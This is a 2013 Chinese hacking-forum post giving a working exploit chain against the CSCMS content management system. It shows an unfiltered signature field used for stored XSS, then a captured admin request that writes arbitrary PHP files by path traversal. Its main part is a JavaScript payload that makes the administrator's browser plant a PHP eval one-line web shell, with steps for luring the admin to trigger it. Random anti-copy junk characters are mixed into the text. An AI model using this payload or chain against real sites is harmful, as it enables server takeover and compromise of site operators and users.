|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题1 {4 k* o4 E" U0 r7 F# P0 M
官网已经修补了,所以重新下了源码
" c# B& q& k0 k) I2 z因为 后台登入 还需要认证码 所以 注入就没看了。
. f' B6 ~0 x: J8 t4 E/ q存在 xss$ e6 L1 h; K" @) `
漏洞文件 user/member/skin_edit.php
. h6 a" X) S& p; V* u' }: z本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
) d' K, B) w. s! c( j" C7 F: ]
6 {7 {9 x# m6 U7 u/ I! P</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
# X8 \$ y: u; j5 @+ e , x% m+ o& a, U& T, a4 E( s' K9 j
</textarea></td></tr> j) l' M, B d2 ^# \* `3 Y, h9 P. ]
5 {- Q! L7 N& u/ l) K
user/do.php % m" z* ^7 {7 u1 h& k3 Y! o: W
: X2 Z5 s$ m; p& p
# r! n" _5 ]3 y0 `+ ?. ^$ @if($op=='zl'){ //资料% ~. p" W, n" ~' G. K$ K
5 J) E9 Q f4 l N% j: y5 T
if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
8 u( \* F. D* h6 q* G1 j exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
2 F" H3 c9 s/ S. J- i @% P4 B, K 4 A9 q2 K' n/ \. [1 \' G
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',* J) i% x$ m0 i9 g" y' k& ~' a
8 o. c# g% C7 t3 r$ ^
CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'4 V* m3 l) [. t7 d/ c. z+ C
where CS_Name='".$cscms_name."'"; ]' }5 Q | f; {& G8 h
' C) Z* @# z& V/ [3 T( y- J if($db->query($sql)){0 r( [; T5 f4 E: j% q2 s
3 {: c. |4 M; h& X; ~6 Q# {- ]' l
exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
2 V+ O @2 _9 Y3 C, q# l & B- L/ Z& S; J4 M* u' D
}else{
# P/ i# J, X$ K1 `. A7 x) o* _ - B1 q& ]3 D( c$ |) s+ V' H
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
, l& ]! \) x; x. L- @$ z- I S8 j 5 Y; N6 K Z7 @! Z- t
}
! @/ O& o3 J2 u: p Q" I/ w/ c7 z7 S/ I9 ~! G. L0 n3 @4 V
% {( ^6 o2 S* t+ u+ D: `- U
没有 过滤导致xss产生。
. C1 m0 W1 Q' F后台 看了下 很奇葩的是可以写任意格式文件。。
& F! I5 _2 t5 i1 q9 L抓包。。 N$ o4 K7 H: e5 Z# x
F( N- b5 B$ V" x4 Z( S2 O. I T; F) p5 ?- b2 u( m! _
本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
2 P/ y6 R$ l7 r( _* S
c) A1 @0 Q0 D+ k& c4 qAccept: text/html, application/xhtml+xml, */*
* G' o& }% s4 `, R" a4 \1 p) D
& e/ |0 T2 Y( j$ x% I2 @Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php% [( \6 _$ J. Q; t5 I5 ~
" j' u! k2 c4 I# G: [
Accept-Language: zh-CN8 F0 \! a F, O4 j7 h7 z# q( V, | D
9 W. b7 [$ J! e5 U2 gUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)5 B- D) r) h! X0 c9 ?
$ u& g. t M _& F0 ^Content-Type: application/x-www-form-urlencoded
- H. c' v( N4 {( S# r / ^1 H% f) T! |- m7 {
Accept-Encoding: gzip, deflate5 j" V& |. R6 D" D" k$ X
5 c' U3 e! O" @9 M9 d6 s0 n# _Host: 127.0.0.1
H7 N3 T. o( X4 u) J
( I5 [0 L8 J- |/ g% |Content-Length: 38# e# N y: A h
$ k [" P# e) U# q3 Z) x) U1 NDNT: 1. G" Z$ ]5 A8 {" m" `
" l1 v! N" [ ` A' K# C d$ h9 @/ sConnection: Keep-Alive
8 w$ ~2 y. R p$ x" U- q
; A! P$ D _; `7 ?, s* \Cache-Control: no-cache
$ ]4 a+ F" ?! X9 L0 \3 N. l / e: p# v) d9 I9 S
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
/ O) M1 k2 q7 L; c: J$ C2 {
3 U9 @3 B( K5 l7 M( A
$ U9 `7 u/ z, c7 V) H; D& `+ r7 ename=aaa.php&content=%3Cs%3E%3Ca%25%3E+ i, J2 k0 o8 O
% S7 c* k' j& J% C
$ n3 s8 y/ q& f/ P* w" @( p4 k% U/ Q+ ^- L. D
于是 构造js如下。
0 @! S8 L$ y: x% z. [, h( _
3 I4 [0 V- D9 O# P+ @本帖隐藏的内容<script>
3 m6 e2 u' v1 OthisTHost = top.location.hostname;
3 @. Q( B4 Q( X
' `6 r- \, R, U* E i7 n" JthisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
2 T5 d6 R9 S- Z! e6 f1 o 0 o1 r& J3 p/ u( ?
function PostSubmit(url, data, msg) {
. W) c5 Z O0 P. w2 I var postUrl = url;
& @$ [ ]) Y! u% W" s0 h1 @
" c3 `# T. B: j; s var postData = data;
) M, N; [6 f3 ~( ], e var msgData = msg;
9 P: q+ X8 [( T/ t8 C' j# x1 H var ExportForm = document.createElement("FORM");
& z* t7 |/ ]. i- ~ document.body.appendChild(ExportForm); 4 X% s# e) c( i
ExportForm.method = "POST"; Q N \1 |4 a. _4 { Z: J4 i
var newElement = document.createElement("input");
/ q' D1 W9 E' L0 V) q newElement.setAttribute("name", "name");
& Q1 t5 T" m/ v9 ^2 N newElement.setAttribute("type", "hidden"); 9 g( A E7 j- z/ P2 h# q9 r# s& Z
var newElement2 = document.createElement("input"); 9 M& V8 f) W. ?" `
newElement2.setAttribute("name", "content"); & q( g$ d+ r! F+ y4 n6 L* ?$ F
newElement2.setAttribute("type", "hidden"); z7 x6 X# n0 _. l$ q$ J# v" J
ExportForm.appendChild(newElement); % f. S! q6 x; u; F+ Y, ?5 `
ExportForm.appendChild(newElement2); ; z( l( z5 l; |& c# V4 Y0 M; C
newElement.value = postData; # d# w# G% m! p6 S
newElement2.value = msgData;
$ X7 u$ o' i5 S9 p ExportForm.action = postUrl;
5 e" X. E+ X/ R; d8 i7 v! j5 ~ ExportForm.submit(); 3 N% T) z7 M8 w7 Z2 ~9 i( Q, B
};' _8 {/ b) F7 C# E( c3 s9 U( ~1 v( o _
% x' f. s3 I: E2 C7 T# ]PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");8 k; r1 M4 I6 [2 w+ G- Z- D1 g" P
; z4 \ A; R) s2 v5 ~) I6 M; Q. _</script>9 G+ ^% G# X1 e: O7 i
, m2 _( }8 } w7 }7 l% V- \2 g# m% X7 d( M$ K7 t' C7 I5 a% {
1 _& i( _4 i/ A0 Ohttp://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入
+ p& t. U6 v- F用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)
: x4 g/ Q7 }! C2 T+ R就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
, D5 b7 @( I' T& C
|
|
发表于 2013-11-6 18:09:37
收藏
支持
反对